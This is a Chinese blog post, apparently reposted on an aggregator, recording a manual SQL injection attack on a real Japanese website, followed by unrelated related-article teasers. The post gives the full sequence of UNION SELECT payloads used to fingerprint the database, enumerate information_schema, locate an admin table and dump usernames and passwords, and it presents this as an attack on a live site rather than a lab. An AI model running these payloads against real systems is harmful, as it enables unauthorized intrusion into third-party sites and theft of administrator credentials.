mysql报错注入实战_MySQL手工注入实战

实战记录,日本某站

注入点 and 语句测试

and1=1 返回正常,and=2跳回首页,可能过滤了

70425592e6b505b1937d510ed97bfec8.png

6e5a01b790b05d1bc68942b2769db505.png

用 ’ 测试返回错误页面

判断为注入点

42250c813127ed9a41b1602062eb580e.png

order by语句查询字段数

fa46133ce6b7a15fd6b885d9e1ab9b65.png

8b5db3095c5678a4a262eac9eb08b469.png

测试字段数为9

05593fa7f21f897851d7d85e2de29bde.png

and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9

报错联合查询语句,查询显示位

2、3为显示位

bd4879a0c81c12b2f35e7e85937b096d.png

使用注入函数可爆出数据库版本信息

c84b5778b9ee541034607f64849ed1ff.png

and 1=2 UNION SELECT 1,@@version_compile_os,3,4,5,6,7,8,9

注入函数@@version_compile_os爆出操作系统

b7faebb11fbd6123b5348cc30d2dbc9d.png

and 1=2 UNION SELECT 1,database(),3,4,5,6,7,8,9

用注入函数database()爆出当前库

ed16116874ac3470aa5f7aa0919d2ba4.png

Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息

and1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8,9 from information_schema.SCHEMATA limit 0,1

c7c0fae0641a66b9c4cd54d54da31c70.png

库1

爆出第二个数据库,limit1,1即可

发现第二个数据库就是当前库

1bc111ae271e322f72a20f1ee82804c6.png

库2

and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9from information_schema.TABLES whereTABLE_SCHEMA=(库2名字16进制)limit 0,1

爆第一个表名,数据库名要转换为16进制

f961ca3730cb4f87bbc1ac4d3b27cd73.png

表1 敏感表

改为limit 1,1可爆第二个表名

a42c53b12bb6fdf8e0ddd30584f5029e.png

表2

and 1=2 union select 1,group_concat(TABLE_NAME),3,4,5,6,7,8,9 from information_schema.TABLES where TABLE_SCHEMA=0x68656E65636961 limit 0,1

使用group_concat(table_name)可以一次爆出全部表名

d0d84553e9cad7b281dd7aacf88cf8e6.png

已得到敏感表名TM_ADMIN_MEMBER,接下来爆字段

表名要转换为16进制

and 1=2 union select

1,COLUMN_NAME,3,4,5,6,7,8,9 from

information_schema.COLUMNSwhere TABLE_NAME= limit 0,1

ccfdeb6684b6534567cdf4010f2a98b9.png

推荐使用这种方法

and 1=2 union select 1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9 from information_schema.COLUMNS where TABLE_NAME= limit 0,1

#COLUMN  翻译为  列

用 group_concat(COLUMN_NAME)函数可以一次爆出全部字段

或者可以修改limit 1,1、limit 2,1.......来一个一个爆出

68dbd785841e97197af55fa34b39c3dc.png

敏感字段

有敏感表名,敏感字段名后就获取内容

经测试login_uid字段存放的是用户名

login_pwd存放的是密码

and 1=2 union select 1,login_uid,login_pwd,4,5,6,7,8,9 from 表名

30ee52900d7c274ccba7b372a257041b.png

接下来的自行脑补.......ca21afcec72d75337ba4bbea62fb9b05.gif

欢迎各位大神指点批评!

晨风

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/267445.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

20个简约风格网站设计作品欣赏

20个简约风格网站设计作品欣赏

这篇文章收集了20个简洁清爽的网站设计作品案例,设计师们能够通过这些优秀的网页设计作品获得灵感,进而设计出更精美,更具有创意的网站作品,一起欣赏。vnsagaPure – Minimal WordPress themeAssemblydeladeeus design studioHocu…
阅读更多...
python 股票自动交易从零开始_Python股票自动交易从零开始

python 股票自动交易从零开始_Python股票自动交易从零开始

课程目录1.Python股票自动交易从零开始~第一集~简介(Av24528809,P1).mp42.Python股票自动交易从零开始~第二集~安装工具包(Av24528809,P2).mp43.Python股票自动交易从零开始~第二集番外~配置Mac工作环境(Av24528809,P3).mp44.Python股票自动交易从零开始~第三集~获得股票列表-A…
阅读更多...
python 银行工作_Python:银行系统实战(一)

python 银行工作_Python:银行系统实战(一)

最近突然抽筋想做一下大学时候做过的银行系统实战~代码就发在这里啦~学弟学妹们请查收~不过是python版本的,你们也用不上。。。两个py文件,一个是后台系统处理的,一个是总控py文件如下:view.py 内容如下:import timecl…
阅读更多...
深入剖析LinkedList:揭秘底层原理

深入剖析LinkedList:揭秘底层原理

文章目录 一、 概述LinkedList1.1 LinkedList简介1.2 LinkedList的优点和缺点 二、 LinkedList数据结构分析2.1 Node节点结构体解析2.2 LinkedList实现了双向链表的原因2.3 LinkedList如何实现了链表的基本操作(增删改查)2.4 LinkedList的遍历方式 三、 …
阅读更多...
mysql+server+80_Windows Server 2019 IIS10.0+PHP(FastCGI)+MySQL环境搭建教程

mysql+server+80_Windows Server 2019 IIS10.0+PHP(FastCGI)+MySQL环境搭建教程

准备篇一、环境说明:操作系统:Windows Server 2019PHP版本:php 7.3.11MySQL版本:MySQL 8.0.18.0二、相关软件下载:1、PHP下载地址:https://windows.php.net/downloads/releases/php-7.3.11-nts-Win32-VC15-…
阅读更多...
SharePoint Server和Office 365之间的混合模式集成概述

SharePoint Server和Office 365之间的混合模式集成概述

正如您可能已经知道的那样,云中的Microsoft Office 365和SharePoint Server 2013/2016内部部署可以通过多种方式协同工作。这些通常被称为混合模式,因为它们将功能集成到SharePoint Online和SharePoint内部部署中。 以下Microsoft提供了下对照表&#xf…
阅读更多...
图片压缩

图片压缩

1)一张图片如何显示到屏幕上 一个电脑显示器, 上面的像素点就是内存/显存一张图片表达的颜色信息赋值到那块内存就是图片显示2)图片文件的格式 图片文件的格式,无论是哪一种,最终都要包含原始颜色数据 原始颜色数据 一个像素用rgb…
阅读更多...
python io操作需要用到什么硬件_Python I/O 操作(一)

python io操作需要用到什么硬件_Python I/O 操作(一)

一、I/O 概念I/O 指的是相对内存而言的 input 和 output从文件、数据库、网络向内存中写入数据叫做 input从内存向文件、数据库、网络中输出数据叫做 outputI/O 操作相比 CPU 操作而言是极慢的,往往 CPU 运行一秒钟,I/O 要忙几个月,所以要提高…
阅读更多...
fortinate防火墙使用本地用户三步开通PPTP ***

fortinate防火墙使用本地用户三步开通PPTP ***

1. 建立用户Local用户及用户组 2. 启用PPTP ***拨号功能 3. 建立***地址,并设置策略:让***用户可以访问内部和外部 (注:建***地址和策略时,接口选择是外部,因为是外部拨入的) 完成上述三步&…
阅读更多...
李国浩20179307第二周作业

李国浩20179307第二周作业

人物介绍 国内知名黑客: 吴翰青:阿里云首席安全科学家、云盾负责人,也是网络安全领域为人熟知的“刺”、“道哥”和“小黑”。他要想黑谁家的网站,别说企业、医院,银行都要彻夜难眠。但小黑是白帽子,黑客最…
阅读更多...
转lua解释执行脚本流程

转lua解释执行脚本流程

本文转自&#xff1a;http://www.cnblogs.com/zxh1210603696/p/4458473.html #include "lua.hpp"#include <iostream> using namespace std;#pragma comment(lib, "lua5.1.lib")struct lua_guard{lua_State *pL;lua_guard(lua_State *s) :pL(s){}~lu…
阅读更多...
BZOJ1085: [SCOI2005]骑士精神

BZOJ1085: [SCOI2005]骑士精神

【传送门&#xff1a;BZOJ1085】 简要题意&#xff1a; 有一个5*5的棋盘&#xff0c;棋盘上有12个白棋子&#xff0c;12个黑棋子&#xff0c;和一个空格&#xff0c;每只棋子只能按照马走日的规则移动&#xff0c;求出最少步数达到以下状态 题解&#xff1a; DFSA* DFS很容易做…
阅读更多...
软测第二周作业WordCount

软测第二周作业WordCount

一、Github地址: https://github.com/duwei1996/wc 二、PSP2.1表格 PSP2.1 PSP阶段 预估耗时 &#xff08;分钟&#xff09; 实际耗时 &#xff08;分钟&#xff09; Planning 计划 3030 Estimate 估计这个任务需要多少时间 3030 Development 开发 540900 Analysis …
阅读更多...
java redirect 跨域_如何解决跨域重定向携带参数的问题?不使用将参数拼接在重定向url末尾的方式...

java redirect 跨域_如何解决跨域重定向携带参数的问题?不使用将参数拼接在重定向url末尾的方式...

如何解决跨域重定向携带参数的问题&#xff1f;不使用将参数拼接在重定向url末尾的方式需求&#xff0c;项目A在服务器A上&#xff0c;需要重定向到服务器B上项目B&#xff0c;并且需要携带参数&#xff0c;参数对用户不可见&#xff0c;所以不可以将参数拼接在重定向url后面&a…
阅读更多...
前端自动化测试工具:SlimerJS、phantomJS 和 CasperJS

前端自动化测试工具:SlimerJS、phantomJS 和 CasperJS

对于富客户端的 Web 应用页面&#xff0c;自动登录、页面修改、抓取页面内容、屏幕截图、页面功能测试…面对这些需求&#xff0c;使用后端语言需要花费不少的精力才能实现。此时 SlimerJS、phantomJS 或 CasperJS 或许是更好的一种选择。 一、PhantomJS 和 SlimerJS PhantomJS…
阅读更多...
java 封装 继承 堕胎_Java的继承、封装和多态

java 封装 继承 堕胎_Java的继承、封装和多态

一、继承继承就是子类继承父类的特征和行为&#xff0c;使得子类对象(实例)具有父类的实例域和方法&#xff0c;或子类从父类继承方法&#xff0c;使得子类具有父类相同的行为。继承的特性子类拥有父类非 private 的属性、方法。子类可以拥有自己的属性和方法&#xff0c;即子类…
阅读更多...
P2782 友好城市

P2782 友好城市

题目描述 有一条横贯东西的大河&#xff0c;河有笔直的南北两岸&#xff0c;岸上各有位置各不相同的N个城市。北岸的每个城市有且仅有一个友好城市在南岸&#xff0c;而且不同城市的友好城市不相同。每对友好城市都向政府申请在河上开辟一条直线航道连接两个城市&#xff0c;但…
阅读更多...
五个在线图形工具创建简单的设计元素

五个在线图形工具创建简单的设计元素

有很多网站可以为图形元素生成提供服务&#xff0c;但获得非常好的工具并不容易。这就是为什么我共享五个在线的图形工具的原因 Logotype Maker 这是一个简单而自由的做标志的Web工具&#xff0c;它可以帮助您创建一个标志 BgPatterns BgPatterns按几次按键&#xff0c;做背景图…
阅读更多...
sulin Python3.6爬虫+Djiago2.0+Mysql --实例demo

sulin Python3.6爬虫+Djiago2.0+Mysql --实例demo

1.切换到项目目录下&#xff0c;启动测试服务器 manage.py runserver 192.168.0.108:8888 2.设置相关配置 项目目录展示如下&#xff1a; beauty>settings.py 修改 2.1 添加app到应用程序中 2.2 设置模板路径 2.3 配置数据为mysql 2.4设置静态文件路径 2.5设置漏油 3.beau…
阅读更多...
dubbo的invoke命令_dubbo 调试服务telnet命令

dubbo的invoke命令_dubbo 调试服务telnet命令

1.概述在我们使用dubbo实现分布式布局时&#xff0c;如果我们想测试我们刚写好的service层服务是否正确时&#xff0c;通常要将service层和web层同时开启&#xff0c;通过浏览器调用controller层端口&#xff0c;达到测试service层的目的。有时&#xff0c;这样的测试方法过于麻…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023